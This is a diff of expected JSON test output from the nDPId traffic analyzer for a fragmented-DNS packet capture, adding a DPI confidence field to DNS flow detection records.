-00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968021013,"flow_last_seen":1558968021013,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1558968021013,"l3_proto":"ip6","src_ip":"2a00:1450:400c:c00::106","dst_ip":"2001:470:765b::a25:53","src_port":54430,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968021013,"flow_last_seen":1558968021013,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1558968021013,"l3_proto":"ip6","src_ip":"2a00:1450:400c:c00::106","dst_ip":"2001:470:765b::a25:53","src_port":54430,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 01575{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1558968021014,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":886,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":886,"pkt_l4_len":832,"ts_msec":1558968021014,"pkt":"AIac51UUAAwpil3Xht1gCbz6A0ARQCABBHB2WwAAAAAAAAolAFMqABRQQAwMAAAAAAAAAAEGADXUngNAM\/ikOIQQAAEAAAAEAAEDZmcyCHdlYmVybGFiAmRlAAAcAAHAEAAGAAEAAAA8ADwDbnMwCHdlYmVyZG5zwBkJd2VibWFzdGVyCXdlYmVybmV0egNuZXQAeFhI6QAADhAAAAOEACTqAAAAADzAEAAuAAEAAAA8AR8ABgoCAAAAPF0SKiBc6o8QkEcId2ViZXJsYWICZGUAsAsLORY9T68251zcXXrXYMubapdXlnVZdczSZ8VjQS3g0dStlbXNUxRf4FJCpZevgIdkz+OzavU4Y3EyCKf5qxw7GiEllt+hznji85+jlwbqxa7BHuVrNf4YxsbIr0kaSblmtIn8e12vMQAgQIzOeK4VKGey+3rFftx2Cs7v0mw4V0Rd+gTYttfq+PLvGu8vSZibXFxqlj86VVzTwvOCEmjqKNyjon+\/djMG\/LpzWXoT2evp9l8K1VcJU\/8uUY9ZE4WS0WjV4uuPKKqmHeTkethHG1xsLp0jKFQP8kYfYkdlxDBuNu6KhurVxO4RiM92K63vMdmIW\/4VjMYm2cPPQCBWTlI1U0hKRjVHQ1RFQ1RIN0wwRUNLTEoxTkRGNE04S8CHADIAAQAAALQAMgEAABQQM4lV2XYIwLE0ewVnw5K1+BQAQBNLJ89Pbt3WSJZWXFg+eo1pkwAGQAAAAAACwZQALgABAAAAtAEfADIKAwAAALRdChEDXOJ73JBHCHdlYmVybGFiAmRlAFwWgMgEjrA1OcHB+Qo5dWmMix1bJ7WFGsQIkPmTlF\/KVvK6k5dVU4FDCZtKPuPYCkg0XLBOcR\/wguOUuuyBL7cbjUoN0UHJur34eNeWLngpBhaxFTmuqY80vKjed0ttFQ6uVnd2OAmDzRp6YxYtTin4\/XGlVO6lMt+k2mYftwRyr5Ohjp6NH+J8dbjX7gkD3ENGAHspVLSTz4LxrhUH8dsbFK8rT\/kUhlCBvTuJYAxOkSEWqp4vVZ54PXcY61pn5KAT8mJWdw+HLsa\/lUjZNXicEmky99XDlPLcJk7OI3ZM83QYPgYAFE\/lMHbTSiiue2rS4deUwWxFmnQYlhv0FA4AACkQAAAAgAAADwAIAAsAAjgAIAEEcB8LFg=="}
-00772{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968021013,"flow_last_seen":1558968021014,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":824,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":441,"midstream":0,"ts_msec":1558968021014,"l3_proto":"ip6","src_ip":"2a00:1450:400c:c00::106","dst_ip":"2001:470:765b::a25:53","src_port":54430,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968021013,"flow_last_seen":1558968021014,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":824,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":441,"midstream":0,"ts_msec":1558968021014,"l3_proto":"ip6","src_ip":"2a00:1450:400c:c00::106","dst_ip":"2001:470:765b::a25:53","src_port":54430,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968021026,"flow_last_seen":1558968021026,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1558968021026,"l3_proto":"ip4","src_ip":"74.125.47.136","dst_ip":"193.24.227.238","src_port":59330,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1558968021026,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1558968021026,"pkt":"AAwpil3XAIac51UUCABFAABEdWYAAGwRujZKfS+IwRjj7ufCADUAMBuRFagAEAABAAAAAAABCHdlYmVybGFiAmRlAAAwAAEAACkQAAAAgAAAAA=="}
-00743{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968021026,"flow_last_seen":1558968021026,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1558968021026,"l3_proto":"ip4","src_ip":"74.125.47.136","dst_ip":"193.24.227.238","src_port":59330,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968021026,"flow_last_seen":1558968021026,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1558968021026,"l3_proto":"ip4","src_ip":"74.125.47.136","dst_ip":"193.24.227.238","src_port":59330,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 02434{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1558968021027,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":1558968021027,"pkt":"AIac51UUAAwpil3XCABFAAXciTwgAEARrMjBGOPuSn0viAA158IGrsPBFaiEEAABAAQAAAABCHdlYmVybGFiAmRlAAAwAAHADAAwAAEAAAA8AQgBAAMKAwEAAdBU3CjxUKw7SeYza7cxyq\/Xg3znVQsMzuF\/UeLaigOubtJHhxhL+m129IxQkTKo8JRIXcKXD+aViztiml8+8BPCXFNPftFpdFCzBRNGHj\/ca1g\/Flck6v5avafB\/hGqbWKY2LEGKb5ktYWGj8JB0mrKGqDZVPyieC0dYVv02iOaOvUhdl7QtgVybR3V6gHlhoG0BxG+GbjUp+NyPClbuMOIwflbVGB5946PyQGQgnGNX2L1MHumOaYC\/D3UnyzQZNMmqj85GwDNPwEeDfLq6wm1BUfx7MwwcEVuO2B0YmUyiPiSfUoGTwm2P1nGNMhlYij3bY9VvyxCqPQnK0s5Tr3ADAAwAAEAAAA8AggBAQMKAwEAAd3v\/e0irXYKOwtYEB3VPe7z99qvi5le9\/y1XXyplp5y\/5xaqrm\/relG8pgx8GsNW2IgviJKAJ6UiU45ERKoH+fz2qf2SUFHFWwkweiWyLZ4EZHhowviCEx94P4OswNKXmdYHe38rlHPa+3OypW9gYfR9lhCKK3neCPq8\/aFFsTTI7dQ+Q2kERWiCMCybl4WOwsBo\/RlnPM4yufMKIlABiM5NWQPNmI6jYzAYpYoyUhd9HnnIIDlNQ89HpXQdFmysMraXYb7qDOoOEiOodttKH0y\/vtJ2SRU05RF4AEumacIUzAi5LL2cMQxC7t7rlDI4X42NRfOLAqGuOeclFjzqz3OdAJWeg\/AAnSbb02AGCkQ370TX1hWveAXt6xpPWOLgHXSLIF\/lz+wl+Dm8ZNWDnn5zEJuEj3xova1g8zmRXJOmqA6VhGqewxF8c+yKeNEOHz4X4\/RLmWHIuEbvboP00Dk5A9bhyZGVsytOJg+NwhFQtvBWLmD82FFtfSt2vmbFFNwAZOnRZWJOG9L7TFcGIm1OEULmohUyFLsBGMXDFOu1k0o6pqm495tsBuMyJNpfdQoPwOkUpsKi6jmNq6vRjvvNiJbcFylTQrqHGTGuOopuUsBbUXj\/nOr4I6j42k6GDIuTyLDkaVrdrxXmGnfNnStdqWmvHXo\/YFwdls9bcT7wAwALgABAAAAPAIfADAKAgAAADxdChURXOJ+MzN7CHdlYmVybGFiAmRlAB+yP4V\/njTX1ZrAUX52Q4ppNzTYQFwUb\/fZ7UyQYLNxrrstLuUEImGhNwZoGn47E0jCxJscYiApT\/lYiL2L1ySUl4RKqHIjPNuYuibs67t5ZabkYsahlYEA\/lOcM3eIQx9pu5Og7p1d2yBSUETOBiGw2mFf2+ESni6Ue4XPXEEYzAhiMRhuYOJAy8gBqoPjkRBcJfWJSQLCsK1uYySkTZfbAzgJeVM0nXd6azgG0BhRE+LeaO6rN3QVHDtfgnwRdZ0mqwEcP9Ixz7o9MUVSKZ24Kp1QfS5nvEHn5PilNALbZYZOO0cQAeV8BhlxVuALLDecEOLC8sY1mx6ozY5\/aRypyHA9HCrJT0qIHJwgtxE7ldoWyzsz32MKgZvCYMZSPOXK\/W3p61FPtD4iT4Id6xXDvyRuALL3waMUMwy3mSjXDHAdpXWaCOMfYx2IzRk4rN5TDQtUohYwaoSbystwDYKnhZGi9jS0G8FObyWhTrKCl7aTkMBaFEejCh0dfD5WJP+MDS\/TR32BG0S+GtGTl4n1Y8wgyP7nkz3\/REcevkIvpJRUImVc8A\/VPTI+9KvBSkoLPA9Za\/IpqUpgDVsKWU5bp0V0TdEryxvtwOnVXXdH0\/hJMgIgWhmZzY2\/UVoRBVGptWsAIhn5sO+UhcjvZ41p3t\/1mWp23BdUACblNtHcw2MALgABAAAAPAEfADAKAgAAADxdChURXOJ+M5BHCHdlYmVybGFiAmRlAHoYKuiyNMNSWsfXwtRR8n\/pKy73at02yEwt1EoWyfptV8sUoxs="}
-00757{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968021026,"flow_last_seen":1558968021027,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1512,"flow_avg_l4_payload_len":756,"midstream":0,"ts_msec":1558968021027,"l3_proto":"ip4","src_ip":"74.125.47.136","dst_ip":"193.24.227.238","src_port":59330,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968021026,"flow_last_seen":1558968021027,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1512,"flow_avg_l4_payload_len":756,"midstream":0,"ts_msec":1558968021027,"l3_proto":"ip4","src_ip":"74.125.47.136","dst_ip":"193.24.227.238","src_port":59330,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}}
 00638{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":17,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":264,"pkt_l4_len":0,"ts_msec":1558968021027,"pkt":"AIac51UUAAwpil3XCABFAAD6iTwAuUAR0PHBGOPuSn0viJJWaQ8FS9tIHo+oVjY51cy6+fgiJNB2zCSb2h1J8D40RJyUZYc0lguNGrMzvogBYnbxInuDKD2B8SGaumxsynJulBSZTde74knucmk+7g4DbM0zyfRD0W3RhD3u0NFdji\/0zmiI817VkCE2GpVvuL3F8KDCC+EMYjJlOHqM+STJxPq9ZF8xJcVITkC6EY6CdRmYmQdqvRYWzDXPjGtyu5XT13H1VC8IJisNUehBDr2PeppANUdXFlyqVQ6mARL6UnTBT0xam7DpmuxycO7BOql2rC7KBJb4lykg9AAAKRAAAACAAAAA"}
 00193{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":17,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":230}
 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968031134,"flow_last_seen":1558968031134,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1558968031134,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c05::10e","dst_ip":"2001:470:765b::a25:53","src_port":34944,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1558968031134,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":121,"pkt_l4_len":67,"ts_msec":1558968031134,"pkt":"AAwpil3XAIac51UUht1gCRS7AEMRbCoAFFBAEwwFAAAAAAAAAQ4gAQRwdlsAAAAAAAAKJQBTiIAANQBD+GeeBgAQAAEAAAAAAAEDZmcyCHdlYmVybGFiAmRlAAAcAAEAACkQAAAAgAAADwAIAAsAAjgAIAEEcB8LFg=="}
-00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968031134,"flow_last_seen":1558968031134,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1558968031134,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c05::10e","dst_ip":"2001:470:765b::a25:53","src_port":34944,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968031134,"flow_last_seen":1558968031134,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1558968031134,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c05::10e","dst_ip":"2001:470:765b::a25:53","src_port":34944,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 01574{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1558968031134,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":886,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":886,"pkt_l4_len":832,"ts_msec":1558968031134,"pkt":"AIac51UUAAwpil3Xht1gAJ7uA0ARQCABBHB2WwAAAAAAAAolAFMqABRQQBMMBQAAAAAAAAEOADWIgANANAyeBoQQAAEAAAAEAAEDZmcyCHdlYmVybGFiAmRlAAAcAAHAEAAGAAEAAAA8ADwDbnMwCHdlYmVyZG5zwBkJd2VibWFzdGVyCXdlYmVybmV0egNuZXQAeFhI6QAADhAAAAOEACTqAAAAADzAEAAuAAEAAAA8AR8ABgoCAAAAPF0SKiBc6o8QkEcId2ViZXJsYWICZGUAsAsLORY9T68251zcXXrXYMubapdXlnVZdczSZ8VjQS3g0dStlbXNUxRf4FJCpZevgIdkz+OzavU4Y3EyCKf5qxw7GiEllt+hznji85+jlwbqxa7BHuVrNf4YxsbIr0kaSblmtIn8e12vMQAgQIzOeK4VKGey+3rFftx2Cs7v0mw4V0Rd+gTYttfq+PLvGu8vSZibXFxqlj86VVzTwvOCEmjqKNyjon+\/djMG\/LpzWXoT2evp9l8K1VcJU\/8uUY9ZE4WS0WjV4uuPKKqmHeTkethHG1xsLp0jKFQP8kYfYkdlxDBuNu6KhurVxO4RiM92K63vMdmIW\/4VjMYm2cPPQCBWTlI1U0hKRjVHQ1RFQ1RIN0wwRUNLTEoxTkRGNE04S8CHADIAAQAAALQAMgEAABQQM4lV2XYIwLE0ewVnw5K1+BQAQBNLJ89Pbt3WSJZWXFg+eo1pkwAGQAAAAAACwZQALgABAAAAtAEfADIKAwAAALRdChEDXOJ73JBHCHdlYmVybGFiAmRlAFwWgMgEjrA1OcHB+Qo5dWmMix1bJ7WFGsQIkPmTlF\/KVvK6k5dVU4FDCZtKPuPYCkg0XLBOcR\/wguOUuuyBL7cbjUoN0UHJur34eNeWLngpBhaxFTmuqY80vKjed0ttFQ6uVnd2OAmDzRp6YxYtTin4\/XGlVO6lMt+k2mYftwRyr5Ohjp6NH+J8dbjX7gkD3ENGAHspVLSTz4LxrhUH8dsbFK8rT\/kUhlCBvTuJYAxOkSEWqp4vVZ54PXcY61pn5KAT8mJWdw+HLsa\/lUjZNXicEmky99XDlPLcJk7OI3ZM83QYPgYAFE\/lMHbTSiiue2rS4deUwWxFmnQYlhv0FA4AACkQAAAAgAAADwAIAAsAAjgAIAEEcB8LFg=="}
-00772{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":19,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968031134,"flow_last_seen":1558968031134,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":824,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":441,"midstream":0,"ts_msec":1558968031134,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c05::10e","dst_ip":"2001:470:765b::a25:53","src_port":34944,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968008021,"flow_last_seen":1558968008021,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1512,"flow_avg_l4_payload_len":756,"midstream":0,"ts_msec":1559042371783,"l3_proto":"ip4","src_ip":"172.217.40.76","dst_ip":"193.24.227.238","src_port":56680,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968018074,"flow_last_seen":1558968018075,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1499,"flow_avg_l4_payload_len":749,"midstream":0,"ts_msec":1559042371783,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c06::105","dst_ip":"2001:470:765b::a25:53","src_port":63369,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968031134,"flow_last_seen":1558968031134,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":824,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":441,"midstream":0,"ts_msec":1559042371783,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c05::10e","dst_ip":"2001:470:765b::a25:53","src_port":34944,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968019069,"flow_last_seen":1558968019069,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1531,"flow_avg_l4_payload_len":765,"midstream":0,"ts_msec":1559042371783,"l3_proto":"ip4","src_ip":"173.194.169.104","dst_ip":"193.24.227.238","src_port":59464,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968021026,"flow_last_seen":1558968021027,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1512,"flow_avg_l4_payload_len":756,"midstream":0,"ts_msec":1559042371783,"l3_proto":"ip4","src_ip":"74.125.47.136","dst_ip":"193.24.227.238","src_port":59330,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968021013,"flow_last_seen":1558968021014,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":824,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":441,"midstream":0,"ts_msec":1559042371783,"l3_proto":"ip6","src_ip":"2a00:1450:400c:c00::106","dst_ip":"2001:470:765b::a25:53","src_port":54430,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968010233,"flow_last_seen":1558968010234,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1498,"flow_avg_l4_payload_len":749,"midstream":0,"ts_msec":1559042371783,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c03::10a","dst_ip":"2001:470:765b::a25:53","src_port":46433,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":19,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968031134,"flow_last_seen":1558968031134,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":824,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":441,"midstream":0,"ts_msec":1558968031134,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c05::10e","dst_ip":"2001:470:765b::a25:53","src_port":34944,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968008021,"flow_last_seen":1558968008021,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1512,"flow_avg_l4_payload_len":756,"midstream":0,"ts_msec":1559042371783,"l3_proto":"ip4","src_ip":"172.217.40.76","dst_ip":"193.24.227.238","src_port":56680,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
